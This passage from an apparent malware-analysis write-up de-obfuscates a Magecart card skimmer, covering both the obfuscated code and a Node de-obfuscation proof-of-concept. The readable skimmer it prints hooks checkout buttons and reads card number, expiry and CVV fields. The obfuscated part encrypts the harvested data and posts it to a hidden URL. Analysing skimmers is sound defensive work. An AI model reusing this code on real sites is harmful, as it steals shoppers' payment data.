      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1c"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x90cd50<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1d"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x188c28<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1e"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x32a59b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">var</span> _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0x3</span><span class="token punctuation">)</span>
      _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">>=</span> <span class="token number">0x3</span><span class="token punctuation">)</span>
      _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0xe078a8 <span class="token operator">=</span> <span class="token punctuation">[</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1f"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x20"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x21"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x22"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x23"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x24"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x25"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x26"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x27"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x28"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token punctuation">]</span><span class="token punctuation">;</span>
    _0x570cfd <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x553440 <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">;</span>
      k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x29"</span><span class="token punctuation">)</span> <span class="token operator">+</span> _0x553440<span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span>_0x553440<span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x12e01e<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x27"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x34f9e9 <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">==</span> vvk<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
      vvk <span class="token operator">=</span> _0x34f9e9<span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x4c73bd <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XMLHttpRequest</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      url <span class="token operator">=</span> <span class="token string">"ht"</span> <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2b"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2c"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2d"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> url <span class="token operator">+</span> <span class="token string">""</span><span class="token punctuation">,</span> <span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2e"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2f"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x30"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0xd96713 <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">JSEncrypt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x31"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x32"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x5dc551 <span class="token operator">=</span> _0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x33"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x34"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"k="</span> <span class="token operator">+</span> _0x5dc551<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x2661d6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>

Magecart Attack De-obfuscation

Once you have separated the layers of the malware, you will be able to reveal its code by doing two simple steps:

  1. Execute Content and the Decryption layers in a sandboxed JavaScript environment
  2. Evaluate Decryption calls with data keys

You can automate the de-obfuscation procedure and use this node script: Note: This code is a proof-of-concept.

<span class="token keyword">const</span> fs <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">"fs"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">//In our example DECRYPTION_FUNCTION_NAME === '_0x47fb'</span>
<span class="token keyword">const</span> <span class="token constant">DECRYPTION_FUNCTION_REGEX</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">RegExp</span><span class="token punctuation">(</span><span class="token template-string"><span class="token template-punctuation string">`</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">${</span><span class="token string">"DECRYPTION_FUNCTION_NAME"</span><span class="token interpolation-punctuation punctuation">}</span></span><span class="token string">\(.*?\)</span><span class="token template-punctuation string">`</span></span><span class="token punctuation">,</span> <span class="token string">"g"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment">//<Content Code Here></span>
<span class="token comment">//<Parser Code Here></span>

<span class="token function">deobfuscateMagecart</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">deobfuscateMagecart</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">let</span> code <span class="token operator">=</span> fs<span class="token punctuation">.</span><span class="token function">readFileSync</span><span class="token punctuation">(</span><span class="token constant">MAGECART_CONTENT_PATH</span><span class="token punctuation">,</span> <span class="token punctuation">{</span> encoding<span class="token operator">:</span> <span class="token string">"utf-8"</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">let</span> match <span class="token operator">=</span> <span class="token constant">DECRYPTION_FUNCTION_REGEX</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span>code<span class="token punctuation">)</span><span class="token punctuation">;</span>

  <span class="token keyword">do</span> <span class="token punctuation">{</span>
    <span class="token keyword">const</span> decryptionFunctionCall <span class="token operator">=</span> match<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment">//e.g _0x47fb('0x0')</span>
    <span class="token keyword">const</span> dataValue <span class="token operator">=</span> <span class="token function">eval</span><span class="token punctuation">(</span>decryptionFunctionCall<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment">//Replace decryption call with evaluated value</span>
    code <span class="token operator">=</span> code<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span>decryptionFunctionCall<span class="token punctuation">,</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">"</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">${</span>dataValue<span class="token interpolation-punctuation punctuation">}</span></span><span class="token string">"</span><span class="token template-punctuation string">`</span></span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    match <span class="token operator">=</span> <span class="token constant">DECRYPTION_FUNCTION_REGEX</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span>code<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token constant">DECRYPTION_FUNCTION_REGEX</span><span class="token punctuation">.</span>lastIndex <span class="token operator">=</span> <span class="token keyword">null</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span> <span class="token keyword">while</span> <span class="token punctuation">(</span>match<span class="token punctuation">)</span><span class="token punctuation">;</span>

  fs<span class="token punctuation">.</span><span class="token function">writeFileSync</span><span class="token punctuation">(</span><span class="token constant">OUTPUT_PATH</span><span class="token punctuation">,</span> code<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

This is the output of the automated de-obfuscation script. As you can see, ALL of the strings are revealed, and it is much easier to understand what Magecart actually does.

<span class="token keyword">function</span> <span class="token function">readyr</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span>
      <span class="token string">"place_order"</span><span class="token punctuation">,</span>
      <span class="token string">"place-order"</span><span class="token punctuation">,</span>
      <span class="token string">"payment-buttons-container"</span><span class="token punctuation">,</span>
      <span class="token string">"billing-buttons-container"</span><span class="token punctuation">,</span>
      <span class="token string">"review-buttons-container"</span><span class="token punctuation">,</span>
    <span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        k <span class="token operator">=</span> <span class="token string">"[id*='"</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> _0x7ddc45 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"querySelectorAll"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">,</span>
          _0x5d458a <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span> _0x5d458a <span class="token operator"><</span> _0x7ddc45<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x5d458a<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x7ddc45<span class="token punctuation">[</span>_0x5d458a<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"addEventListener"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"click"</span><span class="token punctuation">,</span> bts<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x375bef<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x36add6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x5bbf66 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">"btn-checkout"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x8475c0 <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x2e623e <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x2e623e <span class="token operator"><</span> _0x8475c0<span class="token punctuation">;</span> _0x2e623e<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      f <span class="token operator">=</span> _0x5bbf66<span class="token punctuation">[</span>_0x2e623e<span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        k <span class="token operator">=</span> <span class="token string">"[class*='"</span> <span class="token operator">+</span> f <span class="token operator">+</span> <span class="token string">"x27]"</span><span class="token punctuation">;</span>
        <span class="token keyword">var</span> _0x7ddc45 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"querySelectorAll"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">,</span>
          _0x5d458a <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token punctuation">;</span> _0x5d458a <span class="token operator"><</span> _0x7ddc45<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> _0x5d458a<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
          _0x7ddc45<span class="token punctuation">[</span>_0x5d458a<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"addEventListener"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"click"</span><span class="token punctuation">,</span> bts<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x24b4f5<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x196a93<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>

window<span class="token punctuation">[</span><span class="token string">"addEventListener"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"load"</span><span class="token punctuation">,</span> readyr<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setInterval</span><span class="token punctuation">(</span>bts<span class="token punctuation">,</span> <span class="token number">0x7d0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> vvk <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">bts</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">try</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> _0x34f9e9 <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
    _0x34f9e9<span class="token punctuation">[</span><span class="token string">"hostname"</span><span class="token punctuation">]</span> <span class="token operator">=</span> window<span class="token punctuation">[</span><span class="token string">"location"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"hostname"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x4a60b2 <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"querySelectorAll"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"input"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x570cfd <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span><span class="token string">"length"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x57a5b3 <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      el <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"id"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      pos <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token string">"indexOf"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"_cc_number"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span>pos <span class="token operator">></span> <span class="token number">0x0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x57a5b3 <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token string">"substr"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0x0</span><span class="token punctuation">,</span> pos<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x57a5b3<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x553440 <span class="token operator">=</span> _0x57a5b3<span class="token punctuation">;</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_number"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_cc_number"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x1f7150<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_number"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_expiration"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_expiration"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x136215<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_expiration_yr"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_expiration_yr"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4ab22b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token string">"vm_cc_cid"</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token string">"getElementById"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token string">"_cc_cid"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token string">"value"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4df1f0<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
